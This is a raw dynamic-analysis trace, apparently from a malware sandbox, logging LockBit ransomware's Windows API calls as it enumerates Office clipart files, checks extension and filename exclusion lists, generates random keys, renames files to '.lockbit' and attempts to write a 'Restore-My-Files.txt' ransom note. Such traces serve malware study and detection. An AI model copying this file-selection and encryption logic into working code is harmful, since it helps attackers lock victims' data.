lstrcmpiW (lpString1=".", lpString2="WB01843_.GIF") returned -1 [0181.111] lstrcmpiW (lpString1="..", lpString2="WB01843_.GIF") returned -1 [0181.111] PathFindExtensionW (pszPath="WB01843_.GIF") returned=".GIF" [0181.111] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0181.111] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0181.111] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0181.111] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0181.111] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0181.111] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0181.111] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0181.111] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0181.111] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0181.111] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0181.111] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0181.111] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0181.112] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0181.112] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0181.112] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0181.112] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0181.112] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0181.112] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0181.112] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0181.112] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0181.112] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0181.112] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0181.112] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0181.112] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0181.112] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0181.112] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0181.112] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0181.112] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0181.112] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0181.112] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0181.112] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0181.112] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0181.113] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0181.113] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0181.113] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0181.113] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0181.113] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0181.113] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0181.113] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0181.113] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0181.113] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0181.113] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0181.113] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0181.113] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0181.113] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0181.113] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0181.113] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0181.113] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01843_.GIF") returned -1 [0181.113] lstrcmpiW (lpString1="ntldr", lpString2="WB01843_.GIF") returned -1 [0181.113] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01843_.GIF") returned -1 [0181.113] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01843_.GIF") returned -1 [0181.114] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01843_.GIF") returned -1 [0181.114] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01843_.GIF") returned -1 [0181.114] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01843_.GIF") returned -1 [0181.114] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0181.114] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01843_.GIF") returned=".GIF" [0181.114] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0181.114] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0181.114] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0181.114] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0181.114] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0181.114] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0181.114] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0181.114] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0181.114] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0181.114] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0181.114] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0181.114] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0181.114] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0181.114] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0181.114] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0181.115] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0181.115] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0181.115] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0181.115] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0181.115] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0181.115] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0181.115] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0181.115] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0181.115] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0181.115] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0181.115] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0181.115] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0181.115] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0181.115] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01843_.GIF.lockbit") returned 72 [0181.115] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01843_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01843_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0181.117] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0181.117] malloc (_Size=0x40068) returned 0x3f70048 [0181.117] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=4817) returned 1 [0181.117] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.117] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0181.117] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.118] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0181.118] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0182.492] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01843_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01843_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0182.492] malloc (_Size=0xa6) returned 0x1fa2ed8 [0182.492] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0182.492] free (_Block=0x1fa2ed8) [0182.492] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01843_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0182.492] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0182.492] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0182.493] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb347100, ftCreationTime.dwHighDateTime=0x1bd4e4a, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcb347100, ftLastWriteTime.dwHighDateTime=0x1bd4e4a, nFileSizeHigh=0x0, nFileSizeLow=0x102b, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB02229_.GIF", cAlternateFileName="")) returned 1 [0182.493] lstrcmpiW (lpString1=".", lpString2="WB02229_.GIF") returned -1 [0182.493] lstrcmpiW (lpString1="..", lpString2="WB02229_.GIF") returned -1 [0182.493] PathFindExtensionW (pszPath="WB02229_.GIF") returned=".GIF" [0182.493] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0182.493] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0182.493] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0182.493] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0182.493] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0182.493] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0182.493] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0182.493] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0182.493] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0182.493] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0182.493] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0182.493] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0182.493] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0182.493] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0182.493] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0182.493] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0182.493] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0182.493] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0182.493] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0182.493] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0182.493] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0182.494] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0182.494] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0182.494] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0182.494] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0182.494] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0182.494] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB02229_.GIF") returned -1 [0182.494] lstrcmpiW (lpString1="ntldr", lpString2="WB02229_.GIF") returned -1 [0182.495] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB02229_.GIF") returned -1 [0182.495] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB02229_.GIF") returned -1 [0182.495] lstrcmpiW (lpString1="autorun.inf", lpString2="WB02229_.GIF") returned -1 [0182.495] lstrcmpiW (lpString1="thumbs.db", lpString2="WB02229_.GIF") returned -1 [0182.495] lstrcmpiW (lpString1="iconcache.db", lpString2="WB02229_.GIF") returned -1 [0182.495] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0182.495] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB02229_.GIF") returned=".GIF" [0182.495] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0182.495] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0182.495] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0182.495] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0182.495] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0182.495] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0182.495] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0182.495] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0182.495] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0182.495] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0182.495] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0182.495] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0182.495] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0182.495] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0182.495] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0182.495] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0182.495] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0182.495] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0182.495] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0182.496] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0182.496] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0182.496] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0182.496] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0182.496] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0182.496] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0182.496] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0182.496] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0182.496] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0182.496] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB02229_.GIF.lockbit") returned 72 [0182.496] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB02229_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb02229_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0182.498] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0182.498] malloc (_Size=0x40068) returned 0x3df0008 [0182.498] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4139) returned 1 [0182.498] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.499] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0182.499] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.499] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0182.499] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0182.616] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB02229_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB02229_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0182.616] malloc (_Size=0xa6) returned 0x1fa2ed8 [0182.617] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0182.619] free (_Block=0x1fa2ed8) [0182.619] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB02229_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0182.619] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0182.619] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0182.619] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5e5c1270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0xa16, dwReserved0=0x0, dwReserved1=0x0, cFileName="WHIRL1.WMF", cAlternateFileName="")) returned 1 [0182.619] lstrcmpiW (lpString1=".", lpString2="WHIRL1.WMF") returned -1 [0182.619] lstrcmpiW (lpString1="..", lpString2="WHIRL1.WMF") returned -1 [0182.619] PathFindExtensionW (pszPath="WHIRL1.WMF") returned=".WMF" [0182.619] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0182.619] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0182.619] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0182.620] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0182.620] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0182.621] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0182.621] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0182.621] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0182.621] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0182.621] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0182.621] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0182.621] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0182.621] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0182.621] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0182.621] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0182.621] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0182.621] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0182.621] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0182.621] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0182.621] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0182.621] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WHIRL1.WMF") returned -1 [0182.621] lstrcmpiW (lpString1="ntldr", lpString2="WHIRL1.WMF") returned -1 [0182.621] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WHIRL1.WMF") returned -1 [0182.621] lstrcmpiW (lpString1="bootsect.bak", lpString2="WHIRL1.WMF") returned -1 [0182.621] lstrcmpiW (lpString1="autorun.inf", lpString2="WHIRL1.WMF") returned -1 [0182.621] lstrcmpiW (lpString1="thumbs.db", lpString2="WHIRL1.WMF") returned -1 [0182.621] lstrcmpiW (lpString1="iconcache.db", lpString2="WHIRL1.WMF") returned -1 [0182.621] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0182.621] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL1.WMF") returned=".WMF" [0182.621] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.621] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.621] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0182.621] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0182.621] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0182.621] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0182.622] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0182.622] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0182.622] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0182.622] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.622] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0182.622] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0182.622] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0182.622] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0182.622] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0182.622] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0182.622] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0182.622] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0182.622] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0182.622] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0182.622] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0182.622] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0182.622] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0182.622] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0182.622] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0182.622] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") 